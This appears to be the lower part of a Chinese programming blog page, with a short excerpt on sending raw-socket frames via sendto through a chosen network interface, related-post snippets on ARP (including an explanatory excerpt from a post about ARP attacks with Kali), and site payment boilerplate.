一、sendto函数 sendto(sock_raw_fd, msg, msg_len, 0, (struct sockaddr*)&sll, sizeof(sll)); 注意: 1、sock_raw_fd:原始套接字 2、msg:发送的消息(封装好的数字协议) 3、sll:本机网络接口,值发送的数据应该从本机的哪个网卡出去,而不是以前的目的地址 原始套接字:组帧数据报文—>设置从本机的哪块网卡sendto发出去 二、步骤 ①本地接口结构体 头文件:#include <netpack.
[网络]win10添加arp到指定接口
hanfs390的博客
11-17 2666
win10多网卡配置arp
ARP攻击原理和kali实现ARP攻击
热门推荐
cuttleKK的博客
10-28 1万+
目录一、ARP协议和ARP攻击1.ARP协议2.利用wireshark分析ARP数据包3.ARP攻击二、kali实现ARP攻击 一、ARP协议和ARP攻击 1.ARP协议 ARP协议,地址解析协议(Address Resolution Protocol),用来实现IP地址到物理地址的映射。 每一台主机都设有一个ARP高速缓存(ARP cache),里面有本局域网上的各主机和路由器的IP地址到硬件地址的映射表,主机如何获取这些地址的? 例如,主机A向本局域网上的某台主机B发送IP数据报时,要先在ARP高速缓存
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值